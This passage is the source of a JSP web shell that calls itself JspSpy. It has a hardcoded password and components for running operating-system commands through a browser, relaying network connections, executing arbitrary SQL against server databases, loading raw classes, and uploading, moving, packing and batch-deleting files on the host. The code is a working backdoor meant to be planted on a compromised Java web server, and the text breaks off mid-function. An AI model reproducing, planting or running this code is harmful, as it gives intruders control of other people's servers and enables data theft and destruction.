<%@page pageEncoding="ISO-8859-7"%><%@page import="java.io.*"%><%@page impor

1. <%@page pageEncoding="ISO-8859-7"%>
2. <%@page import="java.io.*"%>
3. <%@page import="java.util.*"%>
4. <%@page import="java.util.regex.*"%>
5. <%@page import="java.sql.*"%>
6. <%@page import="java.lang.reflect.*"%>
7. <%@page import="java.nio.charset.*"%>
8. <%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
9. <%@page import="java.text.*"%>
10. <%@page import="java.net.*"%>
11. <%@page import="java.util.zip.*"%>
12. <%@page import="java.util.jar.*"%>
13. <%@page import="java.awt.*"%>
14. <%@page import="java.awt.image.*"%>
15. <%@page import="javax.imageio.*"%>
16. <%@page import="java.awt.datatransfer.DataFlavor"%>
17. <%@page import="java.util.prefs.Preferences"%>
18. <%@page import="javax.sql.DataSource"%>
19. <%@page import="org.springframework.web.context.WebApplicationContext"%>
20. <%@page import="org.springframework.web.context.support.WebApplicationContextUtils"%>
21. <%!private static final String PW = "chen-wei";
22. private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
23. private static final String REQUEST_CHARSET = "ISO-8859-1";
24. private static final String PAGE_CHARSET = "UTF-8";
25. private static final String CURRENT_DIR = "currentdir";
26. private static final String MSG = "SHOWMSG";
27. private static final String PORT_MAP = "PMSA";
28. private static final String DBO = "DBO";
29. private static final String SHELL_ONLINE = "SHELL_ONLINE";
30. private static final String ENTER = "ENTER_FILE";
31. private static final String ENTER_MSG = "ENTER_FILE_MSG";
32. private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR";
33. private static final String SESSION_O = "SESSION_O";
34. private static String SHELL_NAME = "";
35. private static String WEB_ROOT = null;
36. private static String SHELL_DIR = null;
37. public static Map ins = new HashMap();
38. private static boolean ISLINUX = false;
39.  
40. private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout.";
41. private static final String BACK_HREF = " <a href='javascript:history.back()'>Back</a>";
42.  
43. private static class MyRequest extends HttpServletRequestWrapper {
44. public MyRequest(HttpServletRequest req) {
45. super(req);
46. }
47.  
48. public String getParameter(String name) {
49. try {
50. String value = super.getParameter(name);
51. if (name == null)
52. return null;
53. return new String(value.getBytes(REQUEST_CHARSET), PAGE_CHARSET);
54. } catch (Exception e) {
55. return null;
56. }
57. }
58. }
59.  
60. private static class SpyClassLoader extends ClassLoader {
61. public SpyClassLoader() {
62. }
63.  
64. public Class defineClass(String name, byte[] b) {
65. return super.defineClass(name, b, 0, b.length - 2);
66. }
67. }
68.  
69. private static class DBOperator implements Serializable {
70. private Connection conn = null;
71. private Statement stmt = null;
72. private String driver;
73. private String url;
74. private String uid;
75. private String pwd;
76. private String dsStr;
77. private DataSource dataSource;
78. public DBOperator(DataSource dataSource,String dsStr,boolean connect){
79. this.dataSource = dataSource;
80. this.dsStr = dsStr;
81. if (connect){
82. try{
83. this.conn = dataSource.getConnection();
84. }catch(SQLException e){
85. e.printStackTrace();
86. }
87. }
88.  
89. }
90. public DBOperator(String driver, String url, String uid, String pwd)
91. throws Exception {
92. this(driver, url, uid, pwd, false);
93. }
94.  
95. public DBOperator(String driver, String url, String uid, String pwd,
96. boolean connect) throws Exception {
97. Class.forName(driver);
98. if (connect)
99. this.conn = DriverManager.getConnection(url, uid, pwd);
100. this.url = url;
101. this.driver = driver;
102. this.uid = uid;
103. this.pwd = pwd;
104. }
105.  
106. public void connect() throws Exception {
107. if(dataSource!=null){
108. this.conn = dataSource.getConnection();
109. }else{
110. this.conn = DriverManager.getConnection(url, uid, pwd);
111. }
112. }
113.  
114. public Object execute(String sql) throws Exception {
115. if (isValid()) {
116. stmt = conn.createStatement();
117. if (stmt.execute(sql)) {
118. return stmt.getResultSet();
119. } else {
120. return "" + stmt.getUpdateCount();
121. }
122. }
123. throw new Exception("Connection is inValid.");
124. }
125.  
126. public void closeStmt() throws Exception {
127. if (this.stmt != null)
128. stmt.close();
129. }
130.  
131. public boolean isValid() throws Exception {
132. return conn != null && !conn.isClosed();
133. }
134.  
135. public void close() throws Exception {
136. if (isValid()) {
137. closeStmt();
138. conn.close();
139. }
140. }
141.  
142. public boolean equals(Object o) {
143. if (o instanceof DBOperator) {
144. DBOperator dbo = (DBOperator) o;
145. return this.driver.equals(dbo.driver)
146. && this.url.equals(dbo.url) && this.uid.equals(dbo.uid)
147. && this.pwd.equals(dbo.pwd);
148. }
149. return false;
150. }
151.  
152. public Connection getConn() {
153. return this.conn;
154. }
155. }
156.  
157. private static class StreamConnector extends Thread {
158. private InputStream is;
159. private OutputStream os;
160.  
161. public StreamConnector(InputStream is, OutputStream os) {
162. this.is = is;
163. this.os = os;
164. }
165.  
166. public void run() {
167. BufferedReader in = null;
168. BufferedWriter out = null;
169. try {
170. in = new BufferedReader(new InputStreamReader(this.is));
171. out = new BufferedWriter(new OutputStreamWriter(this.os));
172. char buffer[] = new char[8192];
173. int length;
174. while ((length = in.read(buffer, 0, buffer.length)) > 0) {
175. out.write(buffer, 0, length);
176. out.flush();
177. }
178. } catch (Exception e) {
179. }
180. try {
181. if (in != null)
182. in.close();
183. if (out != null)
184. out.close();
185. } catch (Exception e) {
186. }
187. }
188.  
189. public static void readFromLocal(final DataInputStream localIn,
190. final DataOutputStream remoteOut) {
191. new Thread(new Runnable() {
192. public void run() {
193. while (true) {
194. try {
195. byte[] data = new byte[100];
196. int len = localIn.read(data);
197. while (len != -1) {
198. remoteOut.write(data, 0, len);
199. len = localIn.read(data);
200. }
201. } catch (Exception e) {
202. break;
203. }
204. }
205. }
206. }).start();
207. }
208.  
209. public static void readFromRemote(final Socket soc,
210. final Socket remoteSoc, final DataInputStream remoteIn,
211. final DataOutputStream localOut) {
212. new Thread(new Runnable() {
213. public void run() {
214. while (true) {
215. try {
216. byte[] data = new byte[100];
217. int len = remoteIn.read(data);
218. while (len != -1) {
219. localOut.write(data, 0, len);
220. len = remoteIn.read(data);
221. }
222. } catch (Exception e) {
223. try {
224. soc.close();
225. remoteSoc.close();
226. } catch (Exception ex) {
227. }
228. break;
229. }
230. }
231. }
232. }).start();
233. }
234. }
235.  
236. private static class EnterFile extends File {
237. private ZipFile zf = null;
238. private ZipEntry entry = null;
239. private boolean isDirectory = false;
240. private String absolutePath = null;
241.  
242. public void setEntry(ZipEntry e) {
243. this.entry = e;
244. }
245.  
246. public void setAbsolutePath(String p) {
247. this.absolutePath = p;
248. }
249.  
250. public void close() throws Exception {
251. this.zf.close();
252. }
253.  
254. public void setZf(String p) throws Exception {
255. if (p.toLowerCase().endsWith(".jar"))
256. this.zf = new JarFile(p);
257. else
258. this.zf = new ZipFile(p);
259. }
260.  
261. public EnterFile(File parent, String child) {
262. super(parent, child);
263. }
264.  
265. public EnterFile(String pathname) {
266. super(pathname);
267. }
268.  
269. public EnterFile(String pathname, boolean isDir) {
270. this(pathname);
271. this.isDirectory = isDir;
272. }
273.  
274. public EnterFile(String parent, String child) {
275. super(parent, child);
276. }
277.  
278. public EnterFile(URI uri) {
279. super(uri);
280. }
281.  
282. public boolean exists() {
283. return new File(this.zf.getName()).exists();
284. }
285.  
286. public File[] listFiles() {
287. java.util.List list = new ArrayList();
288. java.util.List handled = new ArrayList();
289. String currentDir = super.getPath();
290. currentDir = currentDir.replace('\\', '/');
291. if (currentDir.indexOf("/") == 0) {
292. if (currentDir.length() > 1)
293. currentDir = currentDir.substring(1);
294. else
295. currentDir = "";
296. }
297. Enumeration e = this.zf.entries();
298. while (e.hasMoreElements()) {
299. ZipEntry entry = (ZipEntry) e.nextElement();
300. String eName = entry.getName();
301. if (this.zf instanceof JarFile) {
302. if (!entry.isDirectory()) {
303. EnterFile ef = new EnterFile(eName);
304. ef.setEntry(entry);
305. try {
306. ef.setZf(this.zf.getName());
307. } catch (Exception ex) {
308. }
309. list.add(ef);
310. }
311. } else {
312. if (currentDir.equals("")) {
313. //zip root directory
314. if (eName.indexOf("/") == -1
315. || eName.matches("[^/]+/$")) {
316. EnterFile ef = new EnterFile(eName.replaceAll("/",
317. ""));
318. handled.add(eName.replaceAll("/", ""));
319. ef.setEntry(entry);
320. list.add(ef);
321. } else {
322. if (eName.indexOf("/") != -1) {
323. String tmp = eName.substring(0, eName
324. .indexOf("/"));
325. if (!handled.contains(tmp)
326. && !Util.isEmpty(tmp)) {
327. EnterFile ef = new EnterFile(tmp, true);
328. ef.setEntry(entry);
329. list.add(ef);
330. handled.add(tmp);
331. }
332. }
333. }
334. } else {
335. if (eName.startsWith(currentDir)) {
336. if (eName.matches(currentDir + "/[^/]+/?$")) {
337. //file.
338. EnterFile ef = new EnterFile(eName);
339. ef.setEntry(entry);
340. list.add(ef);
341. if (eName.endsWith("/")) {
342. String tmp = eName.substring(eName
343. .lastIndexOf('/',
344. eName.length() - 2));
345. tmp = tmp.substring(1, tmp.length() - 1);
346. handled.add(tmp);
347. }
348. } else {
349. //dir
350. try {
351. String tmp = eName.substring(currentDir
352. .length() + 1);
353. tmp = tmp.substring(0, tmp.indexOf('/'));
354. if (!handled.contains(tmp)
355. && !Util.isEmpty(tmp)) {
356. EnterFile ef = new EnterFile(tmp, true);
357. ef.setAbsolutePath(currentDir + "/"
358. + tmp);
359. ef.setEntry(entry);
360. list.add(ef);
361. handled.add(tmp);
362. }
363. } catch (Exception ex) {
364. }
365. }
366. }
367. }
368. }
369. }
370. return (File[]) list.toArray(new File[0]);
371. }
372.  
373. public boolean isDirectory() {
374. return this.entry.isDirectory() || this.isDirectory;
375. }
376.  
377. public String getParent() {
378. return "";
379. }
380.  
381. public String getAbsolutePath() {
382. return absolutePath != null ? absolutePath : super.getPath();
383. }
384.  
385. public String getName() {
386. if (this.zf instanceof JarFile) {
387. return this.getAbsolutePath();
388. } else {
389. return super.getName();
390. }
391. }
392.  
393. public long lastModified() {
394. return entry.getTime();
395. }
396.  
397. public boolean canRead() {
398. return false;
399. }
400.  
401. public boolean canWrite() {
402. return false;
403. }
404.  
405. public boolean canExecute() {
406. return false;
407. }
408.  
409. public long length() {
410. return entry.getSize();
411. }
412. }
413.  
414. private static class OnLineProcess {
415. private String cmd = "first";
416. private Process pro;
417.  
418. public OnLineProcess(Process p) {
419. this.pro = p;
420. }
421.  
422. public void setPro(Process p) {
423. this.pro = p;
424. }
425.  
426. public void setCmd(String c) {
427. this.cmd = c;
428. }
429.  
430. public String getCmd() {
431. return this.cmd;
432. }
433.  
434. public Process getPro() {
435. return this.pro;
436. }
437.  
438. public void stop() {
439. this.pro.destroy();
440. }
441. }
442.  
443. private static class OnLineConnector extends Thread {
444. private OnLineProcess ol = null;
445. private InputStream is;
446. private OutputStream os;
447. private String name;
448.  
449. public OnLineConnector(InputStream is, OutputStream os, String name,
450. OnLineProcess ol) {
451. this.is = is;
452. this.os = os;
453. this.name = name;
454. this.ol = ol;
455. }
456.  
457. public void run() {
458. BufferedReader in = null;
459. BufferedWriter out = null;
460. try {
461. in = new BufferedReader(new InputStreamReader(this.is));
462. out = new BufferedWriter(new OutputStreamWriter(this.os));
463. char buffer[] = new char[128];
464. if (this.name.equals("exeRclientO")) {
465. //from exe to client
466. int length = 0;
467. while ((length = in.read(buffer, 0, buffer.length)) > 0) {
468. String str = new String(buffer, 0, length);
469. str = str.replaceAll("&", "&amp;").replaceAll("<",
470. "&lt;").replaceAll(">", "&gt;");
471. str = str.replaceAll("" + (char) 13 + (char) 10,
472. "<br/>");
473. str = str.replaceAll("\n", "<br/>");
474. out.write(str.toCharArray(), 0, str.length());
475. out.flush();
476. }
477. } else {
478. //from client to exe
479. while (true) {
480. while (this.ol.getCmd() == null) {
481. Thread.sleep(500);
482. }
483. if (this.ol.getCmd().equals("first")) {
484. this.ol.setCmd(null);
485. continue;
486. }
487. this.ol.setCmd(this.ol.getCmd() + (char) 10);
488. char[] arr = this.ol.getCmd().toCharArray();
489. out.write(arr, 0, arr.length);
490. out.flush();
491. this.ol.setCmd(null);
492. }
493. }
494. } catch (Exception e) {
495. }
496. try {
497. if (in != null)
498. in.close();
499. if (out != null)
500. out.close();
501. } catch (Exception e) {
502. }
503. }
504. }
505.  
506. private static class Table {
507. private ArrayList rows = null;
508. private boolean echoTableTag = false;
509.  
510. public void setEchoTableTag(boolean v) {
511. this.echoTableTag = v;
512. }
513.  
514. public Table() {
515. this.rows = new ArrayList();
516. }
517.  
518. public void addRow(Row r) {
519. this.rows.add(r);
520. }
521.  
522. public String toString() {
523. StringBuffer html = new StringBuffer();
524. if (echoTableTag)
525. html.append("<table>");
526. for (int i = 0; i < rows.size(); i++) {
527. Row r = (Row) rows.get(i);
528. html
529. .append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
530. ArrayList columns = r.getColumns();
531. for (int a = 0; a < columns.size(); a++) {
532. Column c = (Column) columns.get(a);
533. html.append("<td nowrap>");
534. String vv = Util.htmlEncode(Util.getStr(c.getValue()));
535. if (vv.equals(""))
536. vv = "&nbsp;";
537. html.append(vv);
538. html.append("</td>");
539. }
540. html.append("</tr>");
541. }
542. if (echoTableTag)
543. html.append("</table>");
544. return html.toString();
545. }
546.  
547. public static String rs2Table(ResultSet rs, String sep, boolean op)
548. throws Exception {
549. StringBuffer table = new StringBuffer();
550. ResultSetMetaData meta = rs.getMetaData();
551. int count = meta.getColumnCount();
552. if (!op)
553. table
554. .append("<b style='color:red;margin-left:15px'><i> View Struct </i></b> - <a href=\"javascript:doPost({o:'executesql'})\">View All Tables</a><br/><br/>");
555. else
556. table
557. .append("<b style='color:red;margin-left:15px'><i> All Tables </i></b><br/><br/>");
558. table
559. .append("<script>function view(t){document.getElementById('sql').value='select * from "
560. + sep + "'+t+'" + sep + "';}</script>");
561. table
562. .append("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
563. for (int i = 1; i <= count; i++) {
564. table.append("<td nowrap>" + meta.getColumnName(i) + "</td>");
565. }
566. if (op)
567. table.append("<td>&nbsp;</td>");
568. table.append("</tr>");
569. while (rs.next()) {
570. String tbName = null;
571. table
572. .append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
573. for (int i = 1; i <= count; i++) {
574. String v = rs.getString(i);
575. if (i == 3)
576. tbName = v;
577. table.append("<td nowrap>" + Util.null2Nbsp(v) + "</td>");
578. }
579. if (op)
580. table
581. .append("<td nowrap> <a href=\"#\" onclick=\"view('"
582. + tbName
583. + "')\">View</a> | <a href=\"javascript:doPost({o:'executesql',type:'struct',table:'"
584. + tbName
585. + "'})\">Struct</a> | <a href=\"javascript:doPost({o:'export',table:'"
586. + tbName
587. + "'})\">Export </a> | <a href=\"javascript:doPost({o:'vExport',table:'"
588. + tbName + "'})\">Save To File</a> </td>");
589. table.append("</tr>");
590. }
591. table.append("</table><br/>");
592. return table.toString();
593. }
594. }
595.  
596. private static class Row {
597. private ArrayList cols = null;
598.  
599. public Row() {
600. this.cols = new ArrayList();
601. }
602.  
603. public void addColumn(Column n) {
604. this.cols.add(n);
605. }
606.  
607. public ArrayList getColumns() {
608. return this.cols;
609. }
610. }
611.  
612. private static class Column {
613. private String value;
614.  
615. public Column(String v) {
616. this.value = v;
617. }
618.  
619. public String getValue() {
620. return this.value;
621. }
622. }
623.  
624. private static class Util {
625. public static boolean isEmpty(String s) {
626. return s == null || s.trim().equals("");
627. }
628.  
629. public static boolean isEmpty(Object o) {
630. return o == null || isEmpty(o.toString());
631. }
632.  
633. public static String getSize(long size, char danwei) {
634. if (danwei == 'M') {
635. double v = formatNumber(size / 1024.0 / 1024.0, 2);
636. if (v > 1024) {
637. return getSize(size, 'G');
638. } else {
639. return v + "M";
640. }
641. } else if (danwei == 'G') {
642. return formatNumber(size / 1024.0 / 1024.0 / 1024.0, 2) + "G";
643. } else if (danwei == 'K') {
644. double v = formatNumber(size / 1024.0, 2);
645. if (v > 1024) {
646. return getSize(size, 'M');
647. } else {
648. return v + "K";
649. }
650. } else if (danwei == 'B') {
651. if (size > 1024) {
652. return getSize(size, 'K');
653. } else {
654. return size + "B";
655. }
656. }
657. return "" + 0 + danwei;
658. }
659.  
660. public static boolean exists(String[] arr, String v) {
661. for (int i = 0; i < arr.length; i++) {
662. if (v.equals(arr[i])) {
663. return true;
664. }
665. }
666. return false;
667. }
668.  
669. public static double formatNumber(double value, int l) {
670. NumberFormat format = NumberFormat.getInstance();
671. format.setMaximumFractionDigits(l);
672. format.setGroupingUsed(false);
673. return new Double(format.format(value)).doubleValue();
674. }
675.  
676. public static boolean isInteger(String v) {
677. if (isEmpty(v))
678. return false;
679. return v.matches("^\\d+$");
680. }
681.  
682. public static String formatDate(long time) {
683. SimpleDateFormat format = new SimpleDateFormat(
684. "yyyy-MM-dd hh:mm:ss");
685. return format.format(new java.util.Date(time));
686. }
687.  
688. public static String convertPath(String path) {
689. return path != null ? path.replace('\\', '/') : "";
690. }
691.  
692. public static String htmlEncode(String v) {
693. if (isEmpty(v))
694. return "";
695. return v.replaceAll("&", "&amp;").replaceAll("<", "&lt;")
696. .replaceAll(">", "&gt;");
697. }
698.  
699. public static String getStr(String s) {
700. return s == null ? "" : s;
701. }
702.  
703. public static String null2Nbsp(String s) {
704. if (s == null)
705. s = "&nbsp;";
706. return s;
707. }
708.  
709. public static String getStr(Object s) {
710. return s == null ? "" : s.toString();
711. }
712.  
713. public static String exec(String regex, String str, int group) {
714. Pattern pat = Pattern.compile(regex);
715. Matcher m = pat.matcher(str);
716. if (m.find())
717. return m.group(group);
718. return null;
719. }
720.  
721. public static void outMsg(Writer out, String msg) throws Exception {
722. outMsg(out, msg, "center");
723. }
724.  
725. public static void outMsg(Writer out, String msg, String align)
726. throws Exception {
727. out
728. .write("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:"
729. + align
730. + ";font-weight:bold;margin:10px\">"
731. + msg
732. + "</div>");
733. }
734.  
735. public static String highLight(String str) {
736. str = str
737. .replaceAll(
738. "\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b",
739. "<span style='color:blue'>$1</span>");
740. str = str.replaceAll("\t(//.+)",
741. "\t<span style='color:green'>$1</span>");
742. return str;
743. }
744. }
745.  
746. private static class UploadBean {
747. private String fileName = null;
748. private String suffix = null;
749. private String savePath = "";
750. private ServletInputStream sis = null;
751. private OutputStream targetOutput = null;
752. private byte[] b = new byte[1024];
753.  
754. public void setTargetOutput(OutputStream stream) {
755. this.targetOutput = stream;
756. }
757.  
758. public UploadBean() {
759. }
760.  
761. public void setSavePath(String path) {
762. this.savePath = path;
763. }
764.  
765. public String getFileName() {
766. return this.fileName;
767. }
768.  
769. public void parseRequest(HttpServletRequest request) throws IOException {
770. sis = request.getInputStream();
771. int a = 0;
772. int k = 0;
773. String s = "";
774. while ((a = sis.readLine(b, 0, b.length)) != -1) {
775. s = new String(b, 0, a, PAGE_CHARSET);
776. if ((k = s.indexOf("filename=\"")) != -1) {
777. s = s.substring(k + 10);
778. k = s.indexOf("\"");
779. s = s.substring(0, k);
780. File tF = new File(s);
781. if (tF.isAbsolute()) {
782. fileName = tF.getName();
783. } else {
784. fileName = s;
785. }
786. k = s.lastIndexOf(".");
787. suffix = s.substring(k + 1);
788. upload();
789. }
790. }
791. }
792.  
793. private void upload() throws IOException {
794. try {
795. OutputStream out = null;
796. if (this.targetOutput != null)
797. out = this.targetOutput;
798. else
799. out = new FileOutputStream(new File(savePath, fileName));
800. int a = 0;
801. int k = 0;
802. String s = "";
803. while ((a = sis.readLine(b, 0, b.length)) != -1) {
804. s = new String(b, 0, a);
805. if ((k = s.indexOf("Content-Type:")) != -1) {
806. break;
807. }
808. }
809. sis.readLine(b, 0, b.length);
810. while ((a = sis.readLine(b, 0, b.length)) != -1) {
811. s = new String(b, 0, a);
812. if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45)
813. && (b[3] == 45) && (b[4] == 45)) {
814. break;
815. }
816. out.write(b, 0, a);
817. }
818. if (out instanceof FileOutputStream)
819. out.close();
820. } catch (IOException ioe) {
821. throw ioe;
822. }
823. }
824. }%>
825. <%
826.  
827. SHELL_NAME = request.getServletPath().substring(
828. request.getServletPath().lastIndexOf("/") + 1);
829. String myAbsolutePath = application.getRealPath(request
830. .getServletPath());
831. if (Util.isEmpty(myAbsolutePath)) {//for weblogic
832. SHELL_NAME = request.getServletPath();
833. myAbsolutePath = new File(application.getResource("/")
834. .getPath()
835. + SHELL_NAME).toString();
836. SHELL_NAME = request.getContextPath() + SHELL_NAME;
837. WEB_ROOT = new File(application.getResource("/").getPath())
838. .toString();
839. } else {
840. WEB_ROOT = application.getRealPath("/");
841. }
842. SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,
843. myAbsolutePath.lastIndexOf(File.separator)));
844. if (SHELL_DIR.indexOf('/') == 0)
845. ISLINUX = true;
846. else
847. ISLINUX = false;
848. if (session.getAttribute(CURRENT_DIR) == null)
849. session.setAttribute(CURRENT_DIR, Util.convertPath(SHELL_DIR));
850. //request = new MyRequest(request);
851. if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null
852. || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
853. String o = request.getParameter("o");
854. if(o != null)
855. o = new String(o.getBytes(REQUEST_CHARSET), PAGE_CHARSET);
856. if (o != null && o.equals("login")) {
857. ((Invoker) ins.get("login")).invoke(request, response,
858. session);
859. return;
860. } else if (o != null && o.equals("vLogin")) {
861. ((Invoker) ins.get("vLogin")).invoke(request, response,
862. session);
863. return;
864. } else {
865. ((Invoker) ins.get("vLogin")).invoke(request, response,
866. session);
867. return;
868. }
869. }
870. %>
871. <%!private static interface Invoker {
872. public void invoke(HttpServletRequest request,
873. HttpServletResponse response, HttpSession JSession)
874. throws Exception;
875.  
876. public boolean doBefore();
877.  
878. public boolean doAfter();
879. }
880.  
881. private static class DefaultInvoker implements Invoker {
882. public void invoke(HttpServletRequest request,
883. HttpServletResponse response, HttpSession JSession)
884. throws Exception {
885. }
886.  
887. public boolean doBefore() {
888. return true;
889. }
890.  
891. public boolean doAfter() {
892. return true;
893. }
894. }
895.  
896. private static class ScriptInvoker extends DefaultInvoker {
897. public void invoke(HttpServletRequest request,
898. HttpServletResponse response, HttpSession JSession)
899. throws Exception {
900. try {
901. PrintWriter out = response.getWriter();
902. out
903. .println("<script type=\"text/javascript\">"
904. + " String.prototype.trim = function(){return this.replace(/^\\s+|\\s+$/,'');};"
905. + " function fso(obj) {"
906. + " this.currentDir = '"
907. + JSession.getAttribute(CURRENT_DIR)
908. + "';"
909. + " this.filename = obj.filename;"
910. + " this.path = obj.path;"
911. + " this.filetype = obj.filetype;"
912. + " this.charset = obj.charset;"
913. + " };"
914. + " fso.prototype = {"
915. + " copy:function(){"
916. + " var path = prompt('Copy To : ',this.path);"
917. + " if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"
918. + " doPost({o:'copy',src:this.path,to:path});"
919. + " },"
920. + " move:function() {"
921. + " var path =prompt('Move To : ',this.path);"
922. + " if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"
923. + " doPost({o:'move',src:this.path,to:path})"
924. + " },"
925. + " vEdit:function() {"
926. + " if (!this.charset)"
927. + " doPost({o:'vEdit',filepath:this.path});"
928. + " else"
929. + " doPost({o:'vEdit',filepath:this.path,charset:this.charset});"
930. + " },"
931. + " down:function() {"
932. + " doPost({o:'down',path:this.path})"
933. + " },"
934. + " removedir:function() {"
935. + " if (!confirm('Dangerous ! Are You Sure To Delete '+this.filename+'?'))return;"
936. + " doPost({o:'removedir',dir:this.path});"
937. + " },"
938. + " mkdir:function() {"
939. + " var name = prompt('Input New Directory Name','');"
940. + " if (name == null || name.trim().length == 0)return;"
941. + " doPost({o:'mkdir',name:name});"
942. + " },"
943. + " subdir:function(out) {"
944. + " doPost({o:'filelist',folder:this.path,outentry:(out || 'none')})"
945. + " },"
946. + " parent:function() {"
947. + " var parent=(this.path.substr(0,this.path.lastIndexOf(\"/\")))+'/';"
948. + " doPost({o:'filelist',folder:parent})"
949. + " },"
950. + " createFile:function() {"
951. + " var path = prompt('Input New File Name','');"
952. + " if (path == null || path.trim().length == 0) return;"
953. + " doPost({o:'vCreateFile',filepath:path})"
954. + " },"
955. + " deleteBatch:function() {"
956. + " if (!confirm('Are You Sure To Delete These Files?')) return;"
957. + " var selected = new Array();"
958. + " var inputs = document.getElementsByTagName('input');"
959. + " for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"
960. + " if (selected.length == 0) {alert('No File Selected');return;}"
961. + " doPost({o:'deleteBatch',files:selected.join(',')})"
962. + " },"
963. + " packBatch:function() {"
964. + " var selected = new Array();"
965. + " var inputs = document.getElementsByTagName('input');"
966. + " for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"
967. + " if (selected.length == 0) {alert('No File Selected');return;}"
968. + " var savefilename = prompt('Input Target File Name(Only Support ZIP)','pack.zip');"
969. + " if (savefilename == null || savefilename.trim().length == 0)return;"
970. + " doPost({o:'packBatch',files:selected.join(','),savefilename:savefilename})"
971. + " },"
972. + " pack:function(showconfig) {"
973. + " if (showconfig && confirm('Need Pack Configuration?')) {doPost({o:'vPack',packedfile:this.path});return;}"
974. + " var tmpName = '';"
975. + " if (this.filename.indexOf('.') == -1) tmpName = this.filename;"
976. + " else tmpName = this.filename.substr(0,this.filename.lastIndexOf('.'));"
977. + " tmpName += '.zip';"
978. + " var path = this.path;"
979. + " var name = prompt('Input Target File Name (Only Support Zip)',tmpName);"
980. + " if (name == null || path.trim().length == 0) return;"
981. + " doPost({o:'pack',packedfile:path,savefilename:name})"
982. + " },"
983. + " vEditProperty:function() {"
984. + " var path = this.path;"
985. + " doPost({o:'vEditProperty',filepath:path})"
986. + " },"
987. + " unpack:function() {"
988. + " var path = prompt('unpack to : ',this.currentDir+'/'+this.filename.substr(0,this.filename.lastIndexOf('.')));"
989. + " if (path == null || path.trim().length == 0) return;"
990. + " doPost({o:'unpack',savepath:path,zipfile:this.path})"
991. + " },"
992. + " enter:function() {"
993. + " doPost({o:'enter',filepath:this.path})"
994. + " }"
995. + " };"
996. + " function doPost(obj) {"
997. + " var form = document.forms[\"doForm\"];"
998. + " var elements = form.elements;for (var i = form.length - 1;i>=0;i--){form.removeChild(elements[i])}"
999. + " for (var pro in obj)"
1000. + " {"
1001. + " var input = document.createElement(\"input\");"
1002. + " input.type = \"hidden\";"
1003. + " input.name = pro;"
1004. + " input.value = obj[pro];"
1005. + " form.appendChild(input);"
1006. + " }"
1007. + " form.submit();" + " }" + "</script>");
1008.  
1009. } catch (Exception e) {
1010.  
1011. throw e;
1012. }
1013. }
1014. }
1015.  
1016. private static class BeforeInvoker extends DefaultInvoker {
1017. public void invoke(HttpServletRequest request,
1018. HttpServletResponse response, HttpSession JSession)
1019. throws Exception {
1020. try {
1021. PrintWriter out = response.getWriter();
1022. out
1023. .println("<html><head><title>JspSpy</title><style type=\"text/css\">"
1024. + "body,td{font: 12px Arial,Tahoma;line-height: 16px;}"
1025. + ".input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}"
1026. + ".area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}"
1027. + ".bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}"
1028. + "a {color: #00f;text-decoration:underline;}"
1029. + "a:hover{color: #f00;text-decoration:none;}"
1030. + ".alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}"
1031. + ".alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}"
1032. + ".focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}"
1033. + ".head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}"
1034. + ".head td span{font-weight:normal;}"
1035. + "form{margin:0;padding:0;}"
1036. + "h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}"
1037. + "ul.info li{margin:0;color:#444;line-height:24px;height:24px;}"
1038. + "u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}"
1039. + ".secho{height:400px;width:100%;overflow:auto;border:none}"
1040. + "hr{border: 1px solid rgb(221, 221, 221); height: 0px;}"
1041. + "</style></head><body style=\"margin:0;table-layout:fixed; word-break:break-all\">");
1042. } catch (Exception e) {
1043.  
1044. throw e;
1045. }
1046. }
1047. }
1048.  
1049. private static class AfterInvoker extends DefaultInvoker {
1050. public void invoke(HttpServletRequest request,
1051. HttpServletResponse response, HttpSession JSession)
1052. throws Exception {
1053. try {
1054. PrintWriter out = response.getWriter();
1055. out.println("</body></html>");
1056. } catch (Exception e) {
1057.  
1058. throw e;
1059. }
1060. }
1061. }
1062.  
1063. private static class DeleteBatchInvoker extends DefaultInvoker {
1064. public boolean doBefore() {
1065. return false;
1066. }
1067.  
1068. public boolean doAfter() {
1069. return false;
1070. }
1071.  
1072. public void invoke(HttpServletRequest request,
1073. HttpServletResponse response, HttpSession JSession)
1074. throws Exception {
1075. try {
1076. String files = request.getParameter("files");
1077. int success = 0;
1078. int failed = 0;
1079. if (!Util.isEmpty(files)) {
1080. String currentDir = JSession.getAttribute(CURRENT_DIR)
1081. .toString();
1082. String[] arr = files.split(",");
1083. for (int i = 0; i < arr.length; i++) {
1084. String fs = arr[i];
1085. File f = new File(currentDir, fs);
1086. if (f.delete())
1087. success += 1;
1088. else
1089. failed += 1;
1090. }
1091. }
